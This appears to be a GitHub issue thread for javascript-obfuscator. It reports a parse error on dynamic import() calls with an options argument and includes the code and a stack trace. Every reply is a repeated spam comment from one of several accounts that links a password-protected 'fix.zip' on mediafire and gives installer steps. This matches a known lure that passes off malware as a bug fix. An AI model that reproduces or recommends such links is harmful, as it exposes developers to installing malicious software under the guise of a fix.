### ISSUE TITLE
Unexpected token error when parsing new dynamic import() with 2nd argument options

### ISSUE THREAD

**Issue by Nashorn** [javascript-obfuscator/javascript-obfuscator#1276]
The new dynamic import() method now supports a new 2nd argument options {} argument. It fails on this line:

`
var _module = await import(cssPath, {
    with: { type: "css" }
});
`

ERROR:
Unexpected token (839:54)
> ...import(cssPath, {...
    at Function.processParsingError (/Users/smithjv/Development/arc-kernel/node_modules/javascript-obfuscator/dist/webpack:/javascript-obfuscator/src/ASTParserFacade.ts:77:15)
    at Function.parse (/Users/smithjv/Development/arc-kernel/node_modules/javascript-obfuscator/dist/webpack:/javascript-obfuscator/src/ASTParserFacade.ts:43:49)
    at o.parseCode (/Users/smithjv/Development/arc-kernel/node_modules/javascript-obfuscator/dist/webpack:/javascript-obfuscator/src/JavaScriptObfuscator.ts:87:50)
    at obfuscate (/Users/smithjv/Development/arc-kernel/node_modules/javascript-obfuscator/dist/webpack:/javascript-obfuscator/src/JavaScriptObfuscator.ts:78:30)
    at Function.obfuscate (/Users/smithjv/Development/arc-kernel/node_modules/javascript-obfuscator/dist/webpack:/javascript-obfuscator/src/JavaScriptObfuscatorFacade.ts:16:56)

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
